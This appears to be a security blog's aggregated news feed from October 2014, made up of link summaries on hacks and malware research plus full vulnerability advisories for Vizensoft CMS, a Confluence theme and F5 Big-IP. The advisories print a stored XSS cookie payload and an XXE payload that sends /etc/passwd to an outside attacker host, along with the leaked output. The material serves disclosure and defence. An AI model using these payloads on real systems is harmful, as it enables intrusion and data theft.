October 29, 2014, 3:54 am
A White House computer network was hit by hackers, resulting in a series of outages and connectivity issues, a White House official said Tuesday.
more here......http://www.latimes.com/nation/la-na-white-house-network-hack-20141028-story.html
![]()
↧
October 29, 2014, 3:56 am
One year ago, I blogged about a nasty evolution of Kovter using sick method to ensure people are shocked and in doubt enough to pay ransom.
A week ago doing some Android browsing to check how would react some "Desktop world" badness on mobile I've been pushed a pseudo Porn application
more here.........http://malware.dontneedcoffee.com/2014/10/the-worst-of-windows-police-locker-is.html
![]()
↧
↧
October 29, 2014, 3:57 am
The FTDI driver scandal is in the news, so I thought I'd write up some background, and show what a big deal this is.
more here..........http://blog.erratasec.com/2014/10/the-deal-with-ftdi-driver-scandal.html#.VFDH1PnF-So
![]()
↧
October 29, 2014, 3:58 am
Recently, there was a blog post on the takedown of a botnet used by threat actor group known as Group 72 and their involvement in Operation SMN. This group is sophisticated, well funded, and exclusively targets high profile organizations with high value intellectual property in the manufacturing, industrial, aerospace, defense, and media sector. The primary attack vectors are watering-hole, spear phishing, and other web-based attacks.
more here...........http://blogs.cisco.com/security/talos/opening-zxshell/
![]()
↧
October 29, 2014, 3:59 am
A few years ago I came across an amusing Slashdot story: 'Australian Gov't offers $560k Cryptographic Protocol for Free'. The story concerned a protocol developed by Australia's Centrelink, the equivalent of our Health and Human Services department, that was wonderfully named the Protocol for Lightweight Authentication of ID, or (I kid you not), 'PLAID'.
more here...........http://blog.cryptographyengineering.com/2014/10/attack-of-week-unpicking-plaid.html
![]()
↧
↧
October 29, 2014, 4:00 am
In the recent Hack.LU 2014 conference Saumil Shah from net-square gave a talk on “Hacking with Pictures”. The basic idea behind this talk is hiding Javascipt inside a JPEG file.
more here...........http://hiddencodes.wordpress.com/2014/10/29/hide-javascript-inside-jpeg-file/
![]()
↧
October 29, 2014, 4:02 am
This article is about a funny way to obfuscate code that takes advantage of the Windows 64bit capability to manage and run 32bit processes
more here...........http://scrammed.blogspot.com/2014/10/code-obfunscation-mixing-32-and-64-bit.html
![]()
↧
October 29, 2014, 4:03 am
One of the primary challenges when running a vulnerability coordination program is distinguishing signal from noise. Our former colleagues at Facebook evaluate over 20 invalid submissions for each valid report - that's only 4.6% signal! The programs hosted at HackerOne have fared a bit better: on average 19% of reports are valid, but some outliers deal with as low as 6%. This noise is undesirable for everyone, driving up response time, introducing unnecessary latency in resolving security issues, and increasing the likelihood that valuable signal will get lost.
more here..........https://hackerone.com/news/introducing-reputation
![]()
↧
October 29, 2014, 4:05 am
Basic demo-quality implementation of Apple Pay In-App payment crypto
more here..........https://github.com/beatty/applepay_crypto_demo
![]()
↧
↧
October 29, 2014, 4:06 am
The Microsoft Malware Protection Center (MMPC) has seen a spike in number of detections for threats in the Win32/Crowti ransomware this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits.
more here..........http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
![]()
↧
October 29, 2014, 6:11 am
SEC Consult Vulnerability Lab Security Advisory < 20141029-0 >======================================================================= title: Multiple critical vulnerabilities product: Vizensoft Admin Panel vulnerable version: 2014 fixed version: - impact: critical homepage: http://www.vizensoft.com found: 2014-07-10 by: A. Antukh, A. Baranov SEC Consult Vulnerability Lab https://www.sec-consult.com=======================================================================Vendor & product description:=============================Vizensoft is one of the major software vendors, especially aimed at medicalorganizations in Korea.A list of companies and organizations which are using their software, is availableon the official websites:http://www.vizensoft.com/portfolio/index.jsphttp://www.vizenmedical.com/portfolio/index.jsp"Vizensoft are doing business with online marketing professional IT companiesand individuals in need of a rapidly changing competitive world to discerningcorporate customer's success by providing capabilities of a high qualityMarketing Technology"(translated from Korean)Source: http://vizensoft.com/about/index.jspBusiness recommendation:========================Attackers are able to completely compromise the web application built uponVizensoft CMS as they can gain access to the system and database level andmanage the website as an admin without prior authentication!It is highly recommended by SEC Consult not to use this software until athorough security review has been performed by security professionals and allidentified issues have been resolved.It is assumed that further critical vulnerabilities exist.Vulnerability overview/description:===================================1) Admin Backdoor Account-------------------------The MySQL database table "admin" contains a "vizensoft" admin user with userid 1 with administrative access rights. This user account does NOT show up withinthe "User administration" menu when logged in as administrator user account inthe web interface. Hence the password can't be changed there.2) Authentication Bypass------------------------Unauthenticated attackers are able to gain full access to the administrator paneland thus have total control over the web application, including content change,reading e-mails, modifying users and abusing e-mail and SMS functionality.3) Arbitrary File Upload------------------------At least two vulnerable pages exist where unauthenticated attackers are ableto upload arbitrary files on the server. Furthermore, due to insufficientvalidation it is possible to bypass file extension checks and execute uploadedfiles which leads directly to a complete server compromise.4) Multiple Cross Site Scripting issues---------------------------------------Vizensoft CMS suffers from multiple cross-site scripting vulnerabilities,which allow an attacker to steal other users' sessions, to impersonate otherusers and to gain unauthorized access to the web interface and user messages.5) Multiple unauthenticated SQL injection issues------------------------------------------------The web application framework suffers from multiple SQL injection vulnerabilitiesthat can be exploited without prior authentication!By exploiting this vulnerability, an attacker gains access to all recordsstored in the database with the privileges of the database user.6) Source Code Disclosure-------------------------The default installation of Vizensoft CMS opens a large spectrum for informationgathering for the attacker. It is possible to disclose source code of theapplication, configuration files and even steal passwords for direct connectionto the database.7) Missing Password Policy--------------------------The password policy used in the CMS does not restrict the complexity of thepassword in any way, which makes users of the application vulnerable topossibly bad passwords and further attacks on their accounts such as guessingand brute-forcing.Proof of concept:=================The proof of concept information has been removed from this advisory as thevendor failed to respond within 50 work days and does not provide a fix.1) Admin Backdoor Account-------------------------The password hash MySQL-SHA1 of the hidden admin user vizensoft is:[removed]The user does not show up within the admin web interface even when logged inas an administrator. Moreover, due to intentionally left backdoor login page,it is possible to disclose the password thus making any system which is built onVizensoft CMS vulnerable.Link to the backdoor page is presented below:[removed]Credentials for authentication are the following:vizensoft:[removed]Detailed proof of concept exploits have been removed for this vulnerability.2) Authentication Bypass------------------------Login form for admininstation panel of the Vizensoft CMS can be accessed byfollowing the next URL:[removed]If an attacker tries to access the admin panel without valid authentication,a confirmation window, demanding to proceed to login form, is shown. Thisconfirmation window can be bypassed and the attacker then gains access to theadmin panel.Detailed proof of concept exploits have been removed for this vulnerability.3) Arbitrary File Upload------------------------The following script can be accessed by an unauthenticated attacker in orderto upload arbitrary files to the [removed] directory:[removed]The common problem here is that the filename extension checks are only done onclient and not on the server side, which makes it extremely easy for anattacker to circumvent it and upload a desired file anyway.Moreover, due to vulnerable photo uploader packaged in a default installation ofVizensoft CMS, it is possible to bypass default checks and upload any file on theserver in order to later execute it on the server and gain full access to the system.HTML page serving to upload images is resided on the following URL:[removed]Detailed proof of concept exploits have been removed for this vulnerability.4) Multiple Cross Site Scripting issues---------------------------------------The following URLs are examples for reflected XSS (list is not complete):[removed]It is assumed that further scripts are vulnerable to XSS!Detailed proof of concept exploits have been removed for this vulnerability.5) Multiple unauthenticated SQL injection issues------------------------------------------------The following sample request (no authentication needed!) will return concatenatedstring AABB in the error message which proves the existence of SQL injection.[removed]Further exploitation allows an attacker to extract usernames and passwords from the'admin' table. Since all password hashes are hashed using MySQL SHA-1 without asalt and since the password policy is not strict, it's easy to brute-force extractedpasswords using standard means.Further affected scripts and parameters (list not complete):[removed]It is assumed that further SQL injection vulnerabilities exist!Detailed proof of concept exploits have been removed for this vulnerability.6) Source code disclosure-------------------------The following script can be used to retrieve the content of any file in web rootdirectory:[removed]For example, the following files (both configuration and default functional) can beretrieved via this script:[removed]This is extremely dangerous, since some of them contain configurationinformation for sql server such as connection string, username and cleartextpassword. More files with hardcoded passwords can be obtained - for example,[removed] contains hard-coded passwords for external services.Detailed proof of concept exploits have been removed for this vulnerability.7) Missing Password Policy--------------------------No proof of concept necessary.Vulnerable / tested versions:=============================The vulnerabilities have been verified to exist in the latest version ofVizensoft Admin Panel 2014. It is assumed previous releases are affected too.Vendor contact timeline:------------------------2014-09-09: Contacted vendor through vizensoft@vizensoft.com, requesting encryption keys and attaching responsible disclosure policy. No response.2014-09-12: Contacted vendor through service@vizensoft.com, question@vizensoft.com, info@vizensoft.com and support@vizensoft.com, requesting encryption keys and attaching responsible disclosure policy. No response.2014-10-20: Latest possible release date of 29/10/2014 reminder.2014-10-29: SEC Consult releases security advisory.Solution:---------It is recommended to suspend use of the product until the security update isreleased and a detailed security review of the product has been performed.Workaround:-----------No workaround available.Advisory URL:-------------https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC ConsultVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - ZurichHeadquarter:Mooslackengasse 17, 1190 Vienna, AustriaPhone: +43 1 8903043 0Fax: +43 1 8903043 15Mail: research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF A. Antukh / @2014 ![]()
↧
October 29, 2014, 6:13 am
SEC Consult Vulnerability Lab Security Advisory < 20141029-1 >======================================================================= title: Persistent cross site scripting product: Confluence RefinedWiki Original Theme vulnerable version: 3.x - 4.0.x fixed version: 4.0.12 impact: high homepage: http://www.refinedwiki.com/ found: 2014-08-07 by: Manuel Hofer SEC Consult Vulnerability Lab https://www.sec-consult.com=======================================================================Vendor description:-------------------"RefinedWiki Original Theme is the perfect add-on for smarter collaborationand documentation. It can turn Confluence into an Intranet or Extranet andwith improved organization, more intuitive navigation and customizabledesigns, your whole team will love using Confluence."http://www.refinedwiki.com/en/display/products.aspxBusiness recommendation:------------------------By exploiting this vulnerability, users that are able to create or editcontent, can attack other users of confluence. An attacker might be able togain access to otherwise protected information in confluence.It is recommended to upgrade to the latest version of RefinedWiki OriginalTheme.Vulnerability overview/description:-----------------------------------1) Persistent Cross-Site ScriptingThe vulnerability can be used to persistently include HTML- or JavaScriptcode to the "Activity Stream" of confluence. The code is executed in thebrowser of users if they visit the manipulated site. The vulnerability can beused to change the contents of the displayed site, redirect to other sites orsteal user credentials. Additionally, confluence users are potential victimsof browser exploits and JavaScript Trojans.Proof of concept:-----------------1) Persistent Cross-Site ScriptingA user with the necessary permissions to create or edit content in Confluencecan exploit this vulnerability by placing the XSS payload inside thevulnerable POST parameter "versionComment" as shown in the following request.> POST /pages/doeditpage.action?pageId=111111 HTTP/1.1> [...]> atl_token=5aabd74e50724eaac8290a3447d9f6e7a179559e&originalVersion=5> &title=Title&wysiwygContent=[REMOVED]&watchPageAfterComment=true> &versionComment=<script>alert(document.cookie)</script>> ¬ifyWatchers=true&confirm=Save&viewPermissionsUsers=> &editPermissionsUsers=&viewPermissionsGroups=&editPermissionsGroups=> &parentPageString=&moveHierarchy=true&position=&targetId=&draftId=0> &entityId=9012708&newSpaceKey=toolsThe submitted XSS payload gets executed every time a user visits the activitystream of the edited page.Vulnerable / tested versions:-----------------------------According to the vendor, the affected versions are RefinedWiki Original Themeare 3.x - 4.0.x.Vendor contact timeline:------------------------2014-08-08: Contacting Atlassian through issue tracking platform at https://jira.atlassian.com/browse/CONF-345252014-08-15: Issue identified as part of the RefinedWiki Original Theme and not Confluence itself. Atlassian forwards advisory to RefinedWiki team2014-08-15: Vendor acknowledges the vulnerability2014-08-18: Vendor provides fixed version2014-08-27: Vendor releases fixed version to the public2014-10-29: SEC Consult releases security advisorySolution:---------Upgrade to the latest version available:http://demo.refinedwiki.com/display/rwot/Version+4.0.12Fixes are also included in version 3.5.13 and version 4.1Workaround:------------Advisory URL:-------------https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabSEC ConsultVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - ZurichHeadquarter:Mooslackengasse 17, 1190 Vienna, AustriaPhone: +43 1 8903043 0Fax: +43 1 8903043 15Mail: research at sec-consult dot comWeb: https://www.sec-consult.comBlog: http://blog.sec-consult.comTwitter: https://twitter.com/sec_consultInterested to work with the experts of SEC Consult?Write to career@sec-consult.comEOF Manuel Hofer / @2014 ![]()
↧
October 29, 2014, 8:54 am
Here's a bad sign for CurrentC, the fledgling mobile payment system in development by a consortium of retailers.
CurrentC is sending emails to people warning them "that unauthorized third parties obtained the e-mail addresses of some of you."
Read more: http://www.businessinsider.com/currentc-hacked-2014-10#ixzz3HY9dNTbF
![]()
↧
↧
October 29, 2014, 8:56 am
Many equate DDoS with only one type of attack vector – volumetric. It is not surprising, as these high bandwidth consuming attacks seem to frequent the headlines most often. Volumetric DDoS attacks are easier to identify, and defend against with on-premises or cloud anti-DDoS solutions, or a combination of both.
Recently, Corero Network Security has identified a change in the way attackers are using DDoS as a mechanism to target corporate Enterprises, Hosting Providers and Internet Service Providers.
more here.........http://www.securitybistro.com/?p=8983
![]()
↧
October 29, 2014, 10:04 am
In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they’re sharing their love letters with data-stealing malware buried deep on a victim’s computer.
more here.........http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
![]()
↧
October 29, 2014, 12:39 pm
↧
October 29, 2014, 4:09 pm
Here at Context we work hard to keep our clients safe. During routine client monitoring our analysts noticed some suspicious RDP traffic. It was suspicious for two reasons. Firstly the client was not in the habit of using RDP, and secondly it had a Chinese keyboard layout.
more here..........http://contextis.com/resources/blog/rdp-replay/
![]()
↧
↧
October 29, 2014, 4:30 pm
Tomorrow at MALCON 2014, security researcher Mordechai Guri with guidance of Prof. Yuval Elovici from the cyber security labs at Ben-Gurion University in Israel will present a breakthrough method (“AirHopper) for leaking data from an isolated computer to a mobile phone without the presence of a network. - See more at: http://cyber.bgu.ac.il/content/how-leak-sensitive-data-isolated-computer-air-gap-near-mobile-phone-airhopper#sthash.3J9PYD1r.dpuf
more here...........http://cyber.bgu.ac.il/content/how-leak-sensitive-data-isolated-computer-air-gap-near-mobile-phone-airhopper
![]()
↧
October 30, 2014, 3:45 am
Security incidents seldom are unrelated. Connecting those dots can help us better understand the underlying architecture and groups involved in cyber-crime.
Since early July, we have been tracking a malware campaign that leverages legitimate websites, DNS records and exploit kit operators.
This mechanism in itself is not something new since the majority of drive-by downloads are the result of malicious redirections from legitimate sites and rotating URLs used as the doorway to exploit kit landing pages.
more here............https://blog.malwarebytes.org/exploits-2/2014/10/exposing-the-flash-eitest-malware-campaign/
![]()
↧
October 30, 2014, 3:47 am
Vulnerability title: XML External Entity Injection in F5 Networks Big-IPCVE: CVE-2014-6032Vendor: F5 NetworksProduct: Big-IPAffected version: 11.3.0.39.0Fixed version: N/AReported by: Oliver GruskovnjakDetails:F5 Networks Big-IP is vulnerable to an XML External Entity injection attack. The following xml payload was used to trigger the XXE (The vulnerable URL is redacted due to the number of affected systems):<?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://x.x.x.x/xml?f=/etc/passwd"> %remote;%int;%trick;]><deal type="request" id="1"><card type="query" id="1"/></deal>On the attacking Server the file can be read from web server logs:10.1.10.10 - - [20/Aug/2014:00:17:44 PDT] "GET /xml?f=/etc/passwd HTTP/1.1" 200 128- -> /xml?f=/etc/passwd10.1.10.10 - - [20/Aug/2014 00:17:44] "GET /?p=root:x:0:0:root:/root:/bin/bash%0Abin:x:1:1:bin:/bin:/sbin/nologin%0Adaemon:x:2:2:daemon:/sbin:/sbin/nologin%0Aadm:x:3:4:adm:/var/adm:/sbin/nologin%0Alp:x:4:7:lp:/var/spool/lpd:/sbin/nologin%0Amail:x:8:12:mail:/var/spool/mail:/sbin/nologin%0Auucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin%0Aoperator:x:11:0:operator:/root:/sbin/nologin%0Anobody:x:99:99:Nobody:/:/sbin/nologin%0Atmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin%0Aadmin:x:0:500:Admin%20User:/home/admin:/bin/false%0Aapache:x:48:48:Apache:/usr/local/www:/bin/bash%0Amysql:x:98:98:MySQL%20server:/var/lib/mysql:/sbin/nologin%0Avcsa:x:69:69:virtual%20console%20memory%20owner:/dev:/sbin/nologin%0Aoprofile:x:16:16:Special%20user%20account%20to%20be%20used%20by%20OProfile:/:/sbin/nologin%0Asshd:x:74:74:Privilege-separated%20SSH:/var/empty/sshd:/sbin/nologin%0Asyscheck:x:976:10::/:/sbin/nologin%0Arpc:x:32:32:Portmapper%20RPC%20user:/:/sbin/nologin%0Af5_remoteuser:x:499:499:f 5%20remote%20user%20account:/home/f5_remoteuser:/sbin/nologin%0Apcap:x:77:77::/var/arpwatch:/sbin/nologin%0Atomcat:x:91:91:Apache%20Tomcat:/usr/share/tomcat:/sbin/nologin%0Antp:x:38:38::/etc/ntp:/sbin/nologin%0Anamed:x:25:25:Named:/var/named:/bin/false%0A HTTP/1.1" 200 - 0.0013Further details at:https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-6032/Copyright:Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.Disclaimer:The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.###############################################################This email originates from the systems of PortcullisComputer Security Limited, a Private limited company,registered in England in accordance with the CompaniesAct under number 02763799. The registered officeaddress of Portcullis Computer Security Limited is:Portcullis House, 2 Century Court, Tolpits Lane, Watford,United Kingdom, WD18 9RS.The information in this email is confidential and may belegally privileged. It is intended solely for the addressee.Any opinions expressed are those of the individual anddo not represent the opinion of the organisation. Accessto this email by persons other than the intended recipientis strictly prohibited.If you are not the intended recipient, any disclosure,copying, distribution or other action taken or omitted to betaken in reliance on it, is prohibited and may be unlawful.When addressed to our clients any opinions or advicecontained in this email is subject to the terms andconditions expressed in the applicable Portcullis ComputerSecurity Limited terms of business.####################################################################################################################################################This e-mail message has been scanned for Viruses and Content and clearedby MailMarshal.##################################################################################### ![]()
↧